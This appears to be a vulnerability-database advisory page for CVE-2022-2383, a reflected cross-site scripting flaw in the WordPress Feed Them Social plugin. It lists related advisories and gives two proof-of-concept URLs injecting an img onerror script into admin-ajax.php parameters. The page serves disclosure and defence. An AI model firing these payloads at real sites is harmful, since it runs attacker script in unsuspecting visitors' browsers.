Feed Them Social 3.0.1 - Reflected Cross-Site Scripting vulnerability in authenticated and unauthenticated user
Reporter | Title | Published | Views | Family All 8 |
---|---|---|---|---|
![]() | CVE-2022-2383 | 22 Aug 202215:15 | – | cve |
![]() | CVE-2022-2383 | 22 Aug 202215:15 | – | nvd |
![]() | Cross site scripting | 22 Aug 202215:15 | – | prion |
![]() | WordPress Feed Them Social plugin <= 2.9.9 - Reflected Cross-Site Scripting (XSS) vulnerability | 26 Jul 202200:00 | – | patchstack |
![]() | CVE-2022-2383 Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting | 22 Aug 202215:02 | – | cvelist |
![]() | WordPress Feed Them Social <3.0.1 - Cross-Site Scripting | 25 Aug 202215:48 | – | nuclei |
![]() | CVE-2022-2383 | 22 Aug 202215:15 | – | osv |
![]() | Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting | 26 Jul 202200:00 | – | wpvulndb |
Both can be used against authenticated and unauthenticated users
https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&access_token=<img src onerror=alert(/XSS/)>
https://example.com/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=<img src onerror=alert(/XSS/)>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo